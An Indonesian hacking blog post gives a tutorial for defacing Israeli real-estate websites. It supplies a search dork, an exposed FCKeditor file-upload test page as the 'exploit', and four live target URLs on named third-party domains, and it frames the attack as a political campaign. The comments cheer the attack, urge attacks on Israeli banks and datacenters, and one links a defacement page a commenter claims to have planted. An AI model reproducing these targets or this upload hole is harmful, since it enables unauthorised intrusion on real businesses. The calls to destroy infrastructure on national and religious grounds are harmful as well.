Home / Vuln / Deface Situs Israel: Powered by Real Estate
defaced-hacked-by-binushacker-indonesia

Deface Situs Israel: Powered by Real Estate

Assalamualaikum saudara saudara muslim sebangsa dan setanah air πŸ™‚ kembali bertemu dengan saya Fikri Fakhrezy, ya si kalian bisa panggil saya BadBoy terserah deh kalian mau panggil aku apa? Haha.

Baiklah saya akan share tutorial deface khusus situs ISRAEL, karena saya baru nemuin nya, semalem lah tgl 8 agustus, sekarang kan tgl 9 hehe, ok ni simak aja.

Defaced By Indonesia
#####################################################
Exploit Title: Powered by Real Estate in Israel File Upload Vulnerability
Dork: intext:Powered by Real Estate in Israel
Author: BadBoy
Category: Remote, Webapps
Tested on: Windows Xp SP3
#####################################################

Poc/Exploit:
http://[localhost]/PATCH//FCKeditor/editor/filemanager/connectors/uploadtest.html

Allowed File:
You can upload pdf ,ppt ,txt ,doc ,rtf ,xml ,xsl ,dtd ,zip ,rar ,jpg ,png files

Preview:
– You can see if you success upload file.

Live Target:

– http://www.firstimmo1.com/FCKeditor/editor/filemanager/connectors/uploadtest.html
– http://www.tekoa-realty.com/FCKeditor/editor/filemanager/connectors/uploadtest.html
– http://www.ozma-nechasim.co.il/FCKeditor/editor/filemanager/connectors/uploadtest.html
– http://www.ruben1.com/FCKeditor/editor/filemanager/connectors/uploadtest.html

######################################################
-=[Thanks To: Palembang Hacker Link | Binus Hacker | And All Hacker Muslim :D]=-

Apa pendapat kalian? Pasti mudahkan, karena saya tidak ingin memberikan materi SQL, saya rasa anak kecil pun bisa SQL hehe, sekarang bagaimana kita bermain exploit dengan menyerang URL πŸ™‚

Ok semoga berguna ya, semangat hancurkan ISRAEL, sumpah dari umur saya 11 thn dan sekarang 16 thn, saya sudah mendukung gerakan Freedom Palestina !! Support dan bantu Palestina saudara πŸ˜€

About BadBoy

Saya baik dengan semua orang, asalkan orang itu baik juga kepada saya :) hehe. Big Fans: Manchester City dan Inter Milan

Check Also

php-s3-appo

PHP S3 Appro [Japanese Sites] Vulnerability

Assalamualaikum sahabat B|H, Baik aja ya semoga, karena hari ini saya mau posting seputar proof …

31 comments

  1. ngeliat klo udh berhasil ngupload’a gmn sih gan??

  2. Wahai para saudaraku, kalau bisa numpang saran aja, untuk menjaga diplomasi antar negara indonesia dengan israel jangan sampai terganggu, dimohon agar tidak menyerang site2 israel tanggung2. Kalau cuma nge root dan deface aja, cuma nyapek2 ini doank. Kalau bisa kita FORMAT mereka Punya DATACENTER. jadi ruginya gak tanggung2. Untuk cara nya mari kita berjuang terus belajar mencari kelemahan2 nya. dan samapai tahap ini saya sudah mendapatkan access beberapa server yang nanti akan saya share di GEROMBOLAN HACKER INDONESIA termasuk BINUS HACKER.
    Hidup Indonesia Hacker.

    Salam h3x4

  3. gan pertanyaan ane sama ama yg pertama gmn cara lihat jika kita telah berhasil ngedefacenya, trus mohon diberikan tutorialnya gan. please

  4. owalah om tak kira apaan -_- ternyata cuman demo upload -_-

  5. Mantap om

  6. yooo yoyoyoyoy ,,,,,,,,mantap brooow, allah huakbar,,,,,,,,,! serbu,,,,,,,,,,,,,,

  7. thank’z ….. okeee.. lanjutkan…

  8. @gita : gmna mo ng HACK,, lo web sendiri di HACK ama malingsit

  9. Kevin Dharma Kusuma

    ayo kita bersatu untuk menghancurkannya. salam Binus Hacker. ^^

  10. lebih baik untuk pengetahuan bos
    daripada ngacak ngacak website orang
    maaf kalo tak berkenan
    Peace, Love and Pray
    God Bless Indonesia

  11. Ane bantu Doa aja master πŸ˜€

  12. Hancurkan bro….. πŸ˜€

  13. Cape deeeehhhhh… kirain dapat akses untuk remote control rudalnya Israel…. jangan lupa sekalian belajar tentang radar, buat roket, etc

  14. WARNING !!!
    share info ini hanya untuk pengetahuan semata

  15. ngakak mau hancurin israel gitu caranya, pake nuklir israel lo hack kalau bisa biar meledak sendiri, wkwkwk

  16. ngakak .. ane liat klakuan nubitol so master…mlu2in indo aje,,,hadee

    cma FCKeditor aj ud gaya2an…pke maw hncurin israel lgi….

    ane blain IDF… napa loe,….!!!

    yg kya gni ni, dblng hncurin….ckckck…..mas..mas πŸ˜€

    http://www.firstimmo1.com/data/images/index.txt

    ============================
    ****This Web Has ****
    ::::Defaced::::
    ::::By::::
    :::: 8bomber8 ::::

    ============================

    Dengan selalu berupaya menjadi orang baik
    dan melakukan yang terbaik,
    maka kebaikan akan selalu berada disekitarmu.

    ============================

    Spesial thank to : Piranha Community

  17. wkwkw,,,
    Emang sich kita harus Membantu melawan Israel dengan cara apapun,, makanya kita yang hanya bisa bermain Komputer dan gak tw cara mke Senjata, hehe , kita bantu mereka dengan meretas Website,

    tapi mending kita Meretas Bank Mereka,, wkwkw,, jgn cm Deface tp RUSAK Servernya..!!

  18. wkwkwkwkk..
    Melalui web uploder.. Good dech team binus
    coba lewat indexnya

  19. AYO gan berantas kejahatan ZIONIS,,,
    jangan hanya DEFACE,,
    bank terbesar di israel kita berantas ….

    Insya allah pasti bisa….

  20. Klo soal bikin Rocket atau Missile ane bisa gan, tapi cuman bisa meluncur doank gk meledak HEheheuu πŸ˜€ πŸ˜›
    Gka da tutorial buat Hack suatu system yg dijalankan oleh nukliear israel tersebut gan ? ?

  21. mantaf…
    tapi masih tanggung amat mas brow..

  22. master kalo cara aktifin bom nuklirnya israel biar meledak di negaranya sendiri gimana????…plsss master di cari yaaa….

  23. it’s just a stupid action

  24. gimana nih caranya bingung banget, ksih tutorialnya yg jelas dong om πŸ™

  25. Hack system / keamanan pemerintahannya ada tutorialnya nggak..???

  26. mantep gan.. Kill israel+malaysia

  27. mantep gan.. a good idea
    kalo orang amatir bisanya sih cuma ngritik doang… Hehe

  28. ngeberantas zionis pke fck editor wkwkakakakakak…………..

    gw aja ga bisa hahahahahahah

  29. salut dan siap mendukung aktifitas ini, hancurin apapun yg berbau israel dengan segala yg kita bisa. jangan hiraukan apapun yg kamu dengar dan kamu lihat juga baca..terusan perjuangan mu…..jangan lupa bagi2kan semua ilmu yg di dapat agar semua bisa lakuin smakin bnyk yg bisa semakin seru dunia cyber……..ayo rame2…mengobok..broooooooooooo…hahaha

  30. Halah, kirain deface apaan πŸ˜€

Tinggalkan Balasan

Alamat surel Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *